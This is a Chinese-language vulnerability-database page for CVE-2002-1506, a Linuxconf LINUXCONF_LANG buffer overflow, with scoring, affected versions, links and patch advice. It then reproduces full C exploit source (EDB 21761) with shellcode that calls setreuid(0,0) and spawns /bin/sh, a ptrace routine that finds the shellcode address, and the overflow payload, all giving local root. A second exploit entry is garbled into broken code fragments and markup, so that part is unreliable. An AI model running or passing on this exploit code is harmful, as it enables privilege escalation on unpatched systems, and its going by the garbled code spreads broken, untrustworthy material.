CVE-2002-1506
CVSS7.2
发布时间 :2003-04-02 00:00:00
修订时间 :2008-09-05 16:30:46

[原文]Buffer overflow in Linuxconf before 1.28r4 allows local users to execute arbitrary code via a long LINUXCONF_LANG environment variable, which overflows an error string that is generated.


[CNNVD]Linuxconf本地环境变量缓冲区溢出漏洞。(CNNVD-200304-014)

        Linuxconf 1.28r4 之前的版本存在缓冲区溢出漏洞。本地用户可通过设置超长的 LINUXCONF_LANG 环境变量，溢出 Linuxconf 在生成错误字符串时使用的缓冲区，从而执行任意代码；由于 Linuxconf 通常以 setuid root 方式安装，成功利用可获得 root 权限。修复版本为 1.28r4。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:jacques_gelinas:linuxconf:1.2.1
cpe:/a:jacques_gelinas:linuxconf:1.2.4r4
cpe:/a:jacques_gelinas:linuxconf:1.1.8
cpe:/a:jacques_gelinas:linuxconf:1.2.3r1
cpe:/a:jacques_gelinas:linuxconf:1.1.9r1
cpe:/a:jacques_gelinas:linuxconf:1.2.1r6
cpe:/a:jacques_gelinas:linuxconf:1.2.3
cpe:/a:jacques_gelinas:linuxconf:1.2.1r2
cpe:/a:jacques_gelinas:linuxconf:1.1.6r10
cpe:/a:jacques_gelinas:linuxconf:1.1.9r2
cpe:/a:jacques_gelinas:linuxconf:1.2r2
cpe:/a:jacques_gelinas:linuxconf:1.2.1r1
cpe:/a:jacques_gelinas:linuxconf:1.28r1
cpe:/a:jacques_gelinas:linuxconf:1.2
cpe:/a:jacques_gelinas:linuxconf:1.2.1r8
cpe:/a:jacques_gelinas:linuxconf:1.27r5
cpe:/a:jacques_gelinas:linuxconf:1.2.3r2
cpe:/a:jacques_gelinas:linuxconf:1.27r4
cpe:/a:jacques_gelinas:linuxconf:1.2.1r7
cpe:/a:jacques_gelinas:linuxconf:1.2.2
cpe:/a:jacques_gelinas:linuxconf:1.2.4r5
cpe:/a:jacques_gelinas:linuxconf:1.2r1
cpe:/a:jacques_gelinas:linuxconf:1.27
cpe:/a:jacques_gelinas:linuxconf:1.2.4
cpe:/a:jacques_gelinas:linuxconf:1.2.1r5
cpe:/a:jacques_gelinas:linuxconf:1.28r2
cpe:/a:jacques_gelinas:linuxconf:1.28
cpe:/a:jacques_gelinas:linuxconf:1.2.1r3
cpe:/a:jacques_gelinas:linuxconf:1.2.4r2
cpe:/a:jacques_gelinas:linuxconf:1.28r3
cpe:/a:jacques_gelinas:linuxconf:1.1.7
cpe:/a:jacques_gelinas:linuxconf:1.2.1r4
cpe:/a:jacques_gelinas:linuxconf:1.27r3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1506
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1506
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-014
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5585
(VENDOR_ADVISORY)  BID  5585
http://www.iss.net/security_center/static/9980.php
(VENDOR_ADVISORY)  XF  linuxconf-linuxconflang-env-bo(9980)
http://archives.neohapsis.com/archives/bugtraq/2002-08/0304.html
(VENDOR_ADVISORY)  BUGTRAQ  20020828 iDEFENSE Security Advisory: Linuxconf locally exploitable buffer overflow
http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0093.html
(UNKNOWN)  VULNWATCH  20020828 iDEFENSE Security Advisory: Linuxconf locally exploitable buffer overflow
http://www.solucorp.qc.ca/changes.hc?projet=linuxconf&version=1.28r4
(UNKNOWN)  MISC  http://www.solucorp.qc.ca/changes.hc?projet=linuxconf&version=1.28r4

- 漏洞信息

Linuxconf本地环境变量缓冲区溢出漏洞。
高危 缓冲区溢出
2003-04-02 00:00:00 2005-10-20 00:00:00
本地  
        Linuxconf 1.28r4 之前的版本存在缓冲区溢出漏洞。本地用户可通过设置超长的 LINUXCONF_LANG 环境变量，溢出 Linuxconf 在生成错误字符串时使用的缓冲区，从而执行任意代码；由于 Linuxconf 通常以 setuid root 方式安装，成功利用可获得 root 权限。修复版本为 1.28r4。

- 公告与补丁

        The vendor has released a fix which addresses this issue: Linuxconf 1.28r4 (see the vendor change log linked above). Note that the versions listed below are the affected releases copied from the advisory, not fixed builds; all of them, up to and including 1.28r3, should be upgraded to 1.28r4 or later. Where an upgrade is not possible and linuxconf does not need to run as root, removing the setuid bit from /sbin/linuxconf removes the privilege-escalation impact of this local overflow:
        Jacques Gelinas Linuxconf 1.1.6 r10
        
        Jacques Gelinas Linuxconf 1.1.7
        
        Jacques Gelinas Linuxconf 1.1.8
        
        Jacques Gelinas Linuxconf 1.1.9 r2
        
        Jacques Gelinas Linuxconf 1.1.9 r1
        
        Jacques Gelinas Linuxconf 1.2 r1
        
        Jacques Gelinas Linuxconf 1.2 r2
        
        Jacques Gelinas Linuxconf 1.2
        
        Jacques Gelinas Linuxconf 1.2.1 r3
        
        Jacques Gelinas Linuxconf 1.2.1 r1
        
        Jacques Gelinas Linuxconf 1.2.1 r2
        
        Jacques Gelinas Linuxconf 1.2.1 r5
        
        Jacques Gelinas Linuxconf 1.2.1 r7
        
        Jacques Gelinas Linuxconf 1.2.1 r8
        
        Jacques Gelinas Linuxconf 1.2.1 r6
        
        Jacques Gelinas Linuxconf 1.2.1
        
        Jacques Gelinas Linuxconf 1.2.1 r4
        
        Jacques Gelinas Linuxconf 1.2.2
        
        Jacques Gelinas Linuxconf 1.2.3 r1
        
        Jacques Gelinas Linuxconf 1.2.3
        
        Jacques Gelinas Linuxconf 1.2.3 r2
        
        Jacques Gelinas Linuxconf 1.2.4 r2
        
        Jacques Gelinas Linuxconf 1.2.4
        
        Jacques Gelinas Linuxconf 1.2.4 r5
        
        Jacques Gelinas Linuxconf 1.2.4 r4
        
        Jacques Gelinas Linuxconf 1.27 r3
        
        Jacques Gelinas Linuxconf 1.27
        
        Jacques Gelinas Linuxconf 1.27 r5
        
        Jacques Gelinas Linuxconf 1.27 r4
        
        Jacques Gelinas Linuxconf 1.28 r3
        
        Jacques Gelinas Linuxconf 1.28 r2
        
        Jacques Gelinas Linuxconf 1.28
        
        Jacques Gelinas Linuxconf 1.28 r1
        

- 漏洞信息 (21761)

Linuxconf 1.1.x/1.2.x Local Environment Variable Buffer Overflow Vulnerability (1) (EDBID:21761)
linux local
2002-08-28 Verified
0 RaiSe
N/A [点击下载]
source: http://www.securityfocus.com/bid/5585/info

Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems.

A buffer overflow vulnerability has been reported for Linuxconf. The vulnerability is due to insufficient bounds checking of the LINUXCONF_LANG environment variable. A local attacker who sets LINUXCONF_LANG to an overly long string can trigger the overflow and, because the binary is setuid root, execute arbitrary code with root privileges. 

/* 
 * Linuxconf <= 1.28r3 local xploit
 * by RaiSe <raise@netsearch-ezine.com>
 * http://www.netsearch-ezine.com
 *
 * Tested on:
 *             Mandrake 8.0
 *             Mandrake 8.2
 *             RedHat   7.3
 *
 * (run with no arguments, from a directory you can write to:
 *  it creates a subdirectory and a file named after the shellcode there)
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <asm/user.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

/* Path of the Linuxconf binary that both main() and the probe child exec.
 * The exploit only gains root if this file is setuid root (the advisory text
 * above says it usually is). */
#define PATHLCONF	"/sbin/linuxconf"


/* Locates the shellcode on the stack of a freshly exec'd Linuxconf by tracing
 * a probe child; returns its absolute address.  Defined below. */
unsigned long get_shell(void);

/* i386 Linux shellcode.  The eight leading 0x90 NOPs double as the marker
 * that get_shell() scans for (the word 0x90909090).  Decoded by hand, the
 * rest does: setreuid(0,0) via int 0x80 with eax=0x46, then builds "//bin/sh"
 * on the stack (immediates are xor'ed so the string holds no NUL bytes, which
 * would truncate the environment value) and calls execve() with eax=0x0b.
 * NOTE(review): decoding done from the bytes; confirm with a disassembler. */
char shellcode[]=  // by RaiSe
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc9\x51\xb8\x38"
"\x65\x73\x68\x66\x35\x56\x4a\x50\xb8\x65\x65\x62\x69\x66\x35"
"\x4a\x4a\x50\x89\xe3\x51\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b"
"\xcd\x80";


/*
 * Entry point.  Builds the attack environment and replaces this process with
 * Linuxconf:
 *   - SCODE          carries the shellcode (get_shell() finds where it lands)
 *   - LINUXCONF_LANG is 2048 bytes of that address, repeated
 * The over-long LINUXCONF_LANG value is the overflow described in
 * CVE-2002-1506; the intent is that one of the repeated copies overwrites the
 * saved return address so execution lands in the shellcode.
 *
 * Preconditions: run with no arguments from a writable directory (a directory
 * and a file named after the shellcode are created there and never removed).
 * The exploit assumes the probe run in get_shell() sees exactly the stack
 * layout of the final exec -- same argv, same environment, no stack
 * randomisation (2002-era targets).  Returns only if execl() fails.
 */
int main(void)
{
FILE *fp;
char buf[2056], buf2[2048];
unsigned long shell, *p;
int i;


printf("\n[ Linuxconf Local Xploit by RaiSe ]\n\n");
fflush(stdout);

/* Directory name is the raw shellcode bytes followed by ".eng".  The author
 * gives no reason; presumably Linuxconf opens a language path derived from
 * the environment -- TODO confirm against the 1.28r3 source. */
sprintf(buf2, "%s.eng", shellcode);

/* S_IRWXU = 0700.  Fails if the directory already exists (see message). */
if (mkdir(buf2, S_IRWXU))
	{
	fprintf(stderr, "* Error at creat directory (.eng), +w? is it exist?, "
	                "delete it and run again.\n\n");
	exit(-1);
	}
else	
	/* <shellcode>.eng/<shellcode>.eng -- an empty file inside the directory */
	sprintf(buf2, "%s.eng/%s.eng", shellcode, shellcode);

if ((fp = fopen(buf2, "w")) == NULL)
	{
    fprintf(stderr, "* Error at creat file,  +w?\n\n");
    exit(-1);
	}
else
	fclose(fp);

printf("* Directory + file created ..\n");
printf("   [dont forget to delete it ;)]\n");
fflush(stdout);

/* Probe run: trace a child Linuxconf and read back the shellcode address. */
bzero(buf, sizeof(buf));
shell = get_shell();

p = (unsigned long *) buf;

/* Fill 2048 bytes with the address (512 copies).  buf is 2056 bytes and was
 * zeroed above, so the environment value stays NUL-terminated. */
for (i = 0; i < 2048 ; i+=4)
	*p++ = shell;


/* Same two variables, same order and same lengths as the probe child in
 * get_shell(), so the address measured there is valid for this exec. */
setenv("SCODE", shellcode, 1);
setenv("LINUXCONF_LANG",buf,1);
execl(PATHLCONF, "linuxconf", NULL);

/* Only reached if execl() failed. */
exit(-1);

} /******* end of main() ******/


/*
 * Find the absolute stack address of the shellcode in a Linuxconf process.
 *
 * Forks a probe child that sets the same environment main() will use (SCODE =
 * shellcode, LINUXCONF_LANG = 2048 filler bytes) and execs Linuxconf.  The
 * parent attaches with ptrace, lets the child run into its exec, reads %esp
 * and then scans memory upward one byte at a time until it sees the word
 * 0x90909090 -- the NOP prefix of the shellcode inside the SCODE string.
 * The child is killed and the address is returned.
 *
 * Returns the address of the shellcode's first NOP.  Exits the whole program
 * on any ptrace error.  The 2-second sleep is the only synchronisation between
 * fork and PTRACE_ATTACH, so attach must win that race for the register dump
 * to be the post-exec stop.
 *
 * NOTE(review): PTRACE_PEEKTEXT returns the peeked word, so a legitimate
 * 0xffffffff in memory is indistinguishable from an error here; the usual
 * idiom is errno = 0 before the call and a check of errno afterwards.  The
 * scan is also unbounded -- if the marker is absent it runs until a peek
 * fails at the top of the stack.
 */
unsigned long get_shell(void)
{
unsigned long sc;
struct user_regs_struct regs;
int pid_vuln, n;


/* fork a throw-away probe child */
if (!(pid_vuln = fork()))
	{
	char buf[2056];

	/* Give the parent time to PTRACE_ATTACH before we exec. */
	sleep(2);
	bzero(buf, sizeof(buf));
	/* 2048 x 'A': same length as main()'s payload, harmless content. */
	memset(buf, 0x41, 2048);

	setenv("SCODE", shellcode, 1);
	setenv("LINUXCONF_LANG",buf, 1);
	execl(PATHLCONF, "linuxconf", NULL);

	fprintf(stderr, "Error: execl.\n");
	exit(-1);
	}
else
	{

	if (ptrace(PTRACE_ATTACH, pid_vuln))
		{
		fprintf(stderr, "Error: PTRACE_ATTACH.\n");
		exit(-1);
		}

	/* First stop: the attach itself. */
	waitpid(pid_vuln, NULL, 0);

    printf("\n[* Looking at %%esp .. ]\n");
	fflush(stdout);

    if (ptrace(PTRACE_CONT, pid_vuln, 0, 0))
        {
        fprintf(stderr, "Error: PTRACE_CONT.\n");
        exit(-1);
        }

	/* Second stop: expected to be the traced child's exec of Linuxconf, so
	 * the registers below describe the fresh image's initial stack. */
    waitpid(pid_vuln, NULL, 0);

    if (ptrace(PTRACE_GETREGS, pid_vuln, 0, &regs))
        {
        fprintf(stderr, "Error: PTRACE_GETREGS.\n");
        exit(-1);
        }

	printf("[* Looking at: 0x%08x ]\n", (int) regs.esp);
    fflush(stdout);

	n = 0, sc = 0;

	/* Byte-stepped scan from %esp upward for the shellcode's NOP marker. */
	do 
		{
	    if ((sc = ptrace(PTRACE_PEEKTEXT, pid_vuln,
			 (int)(regs.esp+(n++)), 0)) == -1)
	        {
	        fprintf(stderr, "Error: PTRACE_PEEKTEXT.\n");
	        exit(-1);
    	    }

		} while (sc != 0x90909090);
	
	/* n was post-incremented after the matching peek; step back to it. */
	n--;
	printf("[* Shellcode found at: 0x%08x ]\n", (int)(regs.esp + n));
	fflush(stdout);

	if(ptrace(PTRACE_KILL, pid_vuln, 0, 0))
		{
		fprintf(stderr, "Error: PTRACE_KILL.\n");
		exit(-1);
		}
	else
		{
		/* Reap the probe child before the real exec in main(). */
		waitpid(pid_vuln, NULL, 0);
		printf("[* Xploting .. ]\n\n");
		fflush(stdout);
		sleep(1);
		return((unsigned long)(regs.esp + n));
		}
	}

} /********* end of get_shell() **********/


/* EOF */
		

- 漏洞信息 (21762)

Linuxconf 1.1.x/1.2.x Local Environment Variable Buffer Overflow Vulnerability (2) (EDBID:21762)
linux local
2002-08-28 Verified
0 David Endler
N/A [点击下载]
source: http://www.securityfocus.com/bid/5585/info
 
Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems.
 
A buffer overflow vulnerability has been reported for Linuxconf. The vulnerability is due to insufficient bounds checking of the LINUXCONF_LANG environment variable. A local attacker who sets LINUXCONF_LANG to an overly long string can trigger the overflow and, because the binary is setuid root, execute arbitrary code with root privileges. 

/*
 * This is an exploit for the linuxconf overflow issue.
 *
 * The detail of this hole was published on 08.28.2002 by
 * David Endler from www.idefense.com. 
 *
 * Tested to work on Redhat 7.0 with linuxconf 1.25r3.
 * [The magic numbers that worked for me are: 980 500 2048 1]
 *
 * This is a classical example of stack smashing. L 980 5r36 t bo    3"his is a classical example of stack smashing. L 980 5r36 t bo    3"d/is  con( INUX}

3as .ty ,r burflenvironmehim02 by
 * Fla ofple.25ause gop;&no: jinyean@hotmndl1.253.
 * [Tinclude <sys/ptractypes.h>
#include <


unsigned long geDEFAULT_ALIGN		0ed long geDEFAULT_OFFSET		0ed long geDEFAULT_BUFFER_SIZE	k sed long geDEFAULT_EGG_SIZE	ng. ed long geNOP fp: 0xx90\x90\x90\x90";'>
sourcar buf[2eb\x1f\x5e;;

76\x09(void)
{
88x66\x308;;
");>
sourcar buf[26\x30d{
FILE ;;

ft;;
d{
4e\x09(v
d{
5\x30d");>
sourcar buf[25\x56\x4a\x5d ;;

d8x660[25\x56\x4e8x6dc
ff");>
sourcar buf[2ff[2ff/charstabuf2[2048];
 user_regs_struct ***
int n&quo__asm__leep(1)movl ACE_,%eaxd long)(reF */
ned luln shic,r 90\x*shiv[] n&quo 90\x*r thby Rtels*egg

ell;
sp;&_Rtelssp;&

uln off la=DEFAULT_OFFSET, bCODE=DEFAULT_BUFFER_SIZE

uln i, eggCODE=DEFAULT_EGG_SIZE,     
sourc		pri0		{
		f{
sp;&=uct ***
)-off laint)(regs.esp + nUsut);
p;&nbs

	xrace(PTRA
p;&))
          Rte=1);f;{
sp;&_Rte=(ell;

r, &+    <(-1);
	"=ODE&e &lbCODElcode, 		 (i*(sp;&_Rte++)=sp;&

nt)(te=egg

;
	"=ODE&e &leggCODE- 
len(L)
	{
  -1lcod+)	 (i*(Rte++)=NOP

;
	"=ODE&e &l 
len(L)
	{
  lcod+)	 (i*(Rte++)=90\x90&quoix41, 201);f[bCODE-1]='\0'id_vugg[eggCODE-1]='\0'id_hellcocpy(egg,e
		{
GG=ce(PTRA4		{
pu &quoegg shellcocpy(r thbt;linuxconf", N=ce(PTRA15		{
pu &quor thintf(stderrid);

char shellcode[]=  ,or: execl.\n");
exit(-1);
}axhl/shBrushCpp.js">

Linuxconf 1.1.x/1.2.x Local Environment Variable Buffer Overflow Vulnerability (2) (EDBID:21762)
local
2002-08-28 Verified 0 David Endler
N/A [点击下载]
source: http://www.securityfocus.com/bid/5585/info
 
Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems.
 
A buffer overflow vulnerability has been reported for Linuxconf. The vulnerability is due to insufficient bounds checking of the LINUXCONF_LANG environment variable. A local attacker who sets LINUXCONF_LANG to an overly long string can trigger the overflow and, because the binary is setuid root, execute arbitrary code with root privileges. 
